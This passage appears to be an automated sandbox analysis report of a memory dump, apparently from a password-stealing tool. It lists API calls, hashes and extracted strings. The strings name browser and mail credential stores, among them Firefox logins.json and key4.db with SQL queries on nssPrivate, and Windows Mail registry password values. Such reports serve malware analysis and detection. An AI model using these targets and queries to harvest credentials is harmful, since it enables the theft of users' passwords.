                                • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                • API String ID: 2238633743-192783356
                                Similarity
                                • API ID: PrivateProfileString_mbscmpstrlen
                                • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                • API String ID: 3963849919-1658304561
                                Similarity
                                • API ID: ??2@??3@memcpymemset
                                • String ID: (yE$(yE$(yE
                                • API String ID: 1865533344-362086290
                                APIs
                                • memset.MSVCRT ref: 0040EBD8
                                  • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                • memset.MSVCRT ref: 0040EC2B
                                • memset.MSVCRT ref: 0040EC47
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                • memset.MSVCRT ref: 0040ECDD
                                • memset.MSVCRT ref: 0040ECF2
                                • _mbscpy.MSVCRT ref: 0040ED59
                                • _mbscpy.MSVCRT ref: 0040ED6F
                                • _mbscpy.MSVCRT ref: 0040ED85
                                • _mbscpy.MSVCRT ref: 0040ED9B
                                • _mbscpy.MSVCRT ref: 0040EDB1
                                • _mbscpy.MSVCRT ref: 0040EDC7
                                • memset.MSVCRT ref: 0040EDE1
                                Similarity
                                • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                • API String ID: 3137614212-1455797042
                                APIs
                                  • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                  • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                  • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                  • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                • memset.MSVCRT ref: 0040E5B8
                                • memset.MSVCRT ref: 0040E5CD
                                • _mbscpy.MSVCRT ref: 0040E634
                                • _mbscpy.MSVCRT ref: 0040E64A
                                • _mbscpy.MSVCRT ref: 0040E660
                                • _mbscpy.MSVCRT ref: 0040E676
                                • _mbscpy.MSVCRT ref: 0040E68C
                                • _mbscpy.MSVCRT ref: 0040E69F
                                • memset.MSVCRT ref: 0040E6B5
                                • memset.MSVCRT ref: 0040E6CC
                                  • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                  • Part of subcall function 004066A3: memcmp.MSVCRT ref: 004066EE
                                • memset.MSVCRT ref: 0040E736
                                • memset.MSVCRT ref: 0040E74F
                                • sprintf.MSVCRT ref: 0040E76D
                                • sprintf.MSVCRT ref: 0040E788
                                • _strcmpi.MSVCRT ref: 0040E79E
                                • _strcmpi.MSVCRT ref: 0040E7B7
                                • _strcmpi.MSVCRT ref: 0040E7D3
                                • memset.MSVCRT ref: 0040E858
                                • sprintf.MSVCRT ref: 0040E873
                                • _strcmpi.MSVCRT ref: 0040E889
                                • _strcmpi.MSVCRT ref: 0040E8A5
                                Similarity
                                • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                • API String ID: 4171719235-3943159138
                                • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                APIs
                                • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                • GetWindowRect.USER32(?,?), ref: 00410487
                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                • GetDC.USER32 ref: 004104E2
                                • strlen.MSVCRT ref: 00410522
                                • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                • ReleaseDC.USER32(?,?), ref: 00410580
                                • sprintf.MSVCRT ref: 00410640
                                • SetWindowTextA.USER32(?,?), ref: 00410654
                                • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                • GetClientRect.USER32(?,?), ref: 004106DD
                                • GetWindowRect.USER32(?,?), ref: 004106E7
                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                • GetClientRect.USER32(?,?), ref: 00410737
                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                • String ID: %s:$EDIT$STATIC
                                • API String ID: 1703216249-3046471546
                                • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                APIs
                                • memset.MSVCRT ref: 004024F5
                                  • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                • _mbscpy.MSVCRT ref: 00402533
                                • _mbscpy.MSVCRT ref: 004025FD
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: _mbscpy$QueryValuememset
                                • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                • API String ID: 168965057-606283353
                                • Opcode ID: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                • Opcode Fuzzy Hash: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                APIs
                                • memset.MSVCRT ref: 00402869
                                  • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                                • _mbscpy.MSVCRT ref: 004028A3
                                  • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                • _mbscpy.MSVCRT ref: 0040297B
                                  • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                • API String ID: 1497257669-167382505
                                • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                                APIs
                                • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                • LoadCursorA.USER32(00000067), ref: 0040115F
                                • SetCursor.USER32(00000000,?,?), ref: 00401166
                                • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                • EndDialog.USER32(?,00000001), ref: 0040121A
                                • DeleteObject.GDI32(?), ref: 00401226
                                • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                • ShowWindow.USER32(00000000), ref: 00401253
                                • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                • ShowWindow.USER32(00000000), ref: 00401262
                                • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                • memset.MSVCRT ref: 0040128E
                                • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                • String ID:
                                • API String ID: 2998058495-0
                                • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                APIs
                                  • Part of subcall function 00409070: LoadMenuA.USER32(00000000), ref: 00409078
                                  • Part of subcall function 00409070: sprintf.MSVCRT ref: 0040909B
                                • SetMenu.USER32(?,00000000), ref: 0040BD23
                                • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BD56
                                • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BD6C
                                • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BDCC
                                • LoadIconA.USER32(00000066,00000000), ref: 0040BE3B
                                • _strcmpi.MSVCRT ref: 0040BE93
                                • RegDeleteKeyA.ADVAPI32(80000001,0044C52F), ref: 0040BEA8
                                • SetFocus.USER32(?,00000000), ref: 0040BECE
                                • GetFileAttributesA.KERNEL32(0045AB10), ref: 0040BEE7
                                • GetTempPathA.KERNEL32(00000104,0045AB10), ref: 0040BEF7
                                • strlen.MSVCRT ref: 0040BEFE
                                • strlen.MSVCRT ref: 0040BF0C
                                • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BF68
                                  • Part of subcall function 00404B87: strlen.MSVCRT ref: 00404BA4
                                  • Part of subcall function 00404B87: SendMessageA.USER32(?,0000101B,?,?), ref: 00404BC8
                                • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BFB3
                                • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BFC6
                                • memset.MSVCRT ref: 0040BFDB
                                • SetWindowTextA.USER32(?,?), ref: 0040BFFF
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                • API String ID: 2303586283-933021314
                                • Opcode ID: c18e167360c9832f76d4060667def10e2fdfd132df2f90ae90de526b0002aaa1
                                • Instruction ID: 018683a0c001df71ea8fb117e25ab04faf3265e4b472b332b07084323bdedb2f
                                • Opcode Fuzzy Hash: c18e167360c9832f76d4060667def10e2fdfd132df2f90ae90de526b0002aaa1
                                • Instruction Fuzzy Hash: 5DC1C071644388FFEB15DF64CC45BDABBA5FF14304F04016AFA44A7292C7B5A904CBA9
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcmp$memcpy
                                • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                • API String ID: 231171946-2189169393
                                • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: _mbscat$memsetsprintf$_mbscpy
                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                • API String ID: 633282248-1996832678
                                • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                APIs
                                Strings
                                • , xrefs: 00406834
                                • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                • key4.db, xrefs: 00406756
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy$memcmp$memsetstrlen
                                • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                • API String ID: 3614188050-3983245814
                                • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                • API String ID: 710961058-601624466
                                • Opcode ID: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                                • Opcode Fuzzy Hash: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: sprintf$memset$_mbscpy
                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                • API String ID: 3402215030-3842416460
                                • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                APIs
                                  • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                  • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                  • Part of subcall function 004080D4: ??3@YAXPAX@Z.MSVCRT ref: 004080DB
                                  • Part of subcall function 00407035: _mbscpy.MSVCRT ref: 0040703A
                                  • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                  • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                  • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DBD8
                                  • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DC38
                                  • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                • strlen.MSVCRT ref: 0040F139
                                • strlen.MSVCRT ref: 0040F147
                                • memset.MSVCRT ref: 0040F187
                                • strlen.MSVCRT ref: 0040F196
                                • strlen.MSVCRT ref: 0040F1A4
                                • memset.MSVCRT ref: 0040F1EA
                                • strlen.MSVCRT ref: 0040F1F9
                                • strlen.MSVCRT ref: 0040F207
                                • _strcmpi.MSVCRT ref: 0040F2B2
                                • _mbscpy.MSVCRT ref: 0040F2CD
                                • _mbscpy.MSVCRT ref: 0040F30E
                                  • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                                  • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_mbsicmp_strcmpistrrchr
                                • String ID: logins.json$none$signons.sqlite$signons.txt
                                • API String ID: 1613542760-3138536805
                                • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                • API String ID: 1012775001-1343505058
                                • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                APIs
                                • memset.MSVCRT ref: 00444612
                                  • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                • strlen.MSVCRT ref: 0044462E
                                • memset.MSVCRT ref: 00444668
                                • memset.MSVCRT ref: 0044467C
                                • memset.MSVCRT ref: 00444690
                                • memset.MSVCRT ref: 004446B6
                                  • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D296
                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                  • Part of subcall function 0040D2A3: memcpy.MSVCRT ref: 0040D30F
                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                • memcpy.MSVCRT ref: 004446ED
                                  • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D248
                                  • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D272
                                  • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                • memcpy.MSVCRT ref: 00444729
                                • memcpy.MSVCRT ref: 0044473B
                                • _mbscpy.MSVCRT ref: 00444812
                                • memcpy.MSVCRT ref: 00444843
                                • memcpy.MSVCRT ref: 00444855
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpymemset$strlen$_mbscpy
                                • String ID: salu
                                • API String ID: 3691931180-4177317985
                                • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                APIs
                                • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: AddressProc$Library$FreeLoad
                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                • API String ID: 2449869053-232097475
                                • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                APIs
                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                • strlen.MSVCRT ref: 00443AD2
                                • ??2@YAPAXI@Z.MSVCRT ref: 00443AE2
                                • memset.MSVCRT ref: 00443B2E
                                • memset.MSVCRT ref: 00443B4B
                                • _mbscpy.MSVCRT ref: 00443B79
                                • RegCloseKey.ADVAPI32(?), ref: 00443BBD
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00443C0E
                                • LocalFree.KERNEL32(?), ref: 00443C23
                                • ??3@YAXPAX@Z.MSVCRT ref: 00443C2C
                                  • Part of subcall function 0040737C: strtoul.MSVCRT ref: 00407384
                                Strings
                                • Software\Microsoft\Windows Live Mail, xrefs: 00443B6D
                                • Salt, xrefs: 00443BA7
                                • Software\Microsoft\Windows Mail, xrefs: 00443B61
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: _mbscpymemset$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                • API String ID: 665470638-2687544566
                                • Opcode ID: 7cb30311ba7eed61cb83e58bd1bf389174eb1fc448745f2dd655db9f8e6608db
                                • Instruction ID: b5c6082ae13936646b807c1e62aeefce293f73be8e3cc3c219efd7c8c3ae97f2
                                • Opcode Fuzzy Hash: 7cb30311ba7eed61cb83e58bd1bf389174eb1fc448745f2dd655db9f8e6608db
                                • Instruction Fuzzy Hash: C2415276C0425CAADB11DFA5DC81EDEB7BCEB48315F1401AAE945F3142DA38EA44CB68
                                APIs
                                • sprintf.MSVCRT ref: 0040957B
                                • LoadMenuA.USER32(?,?), ref: 00409589
                                  • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                  • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                  • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
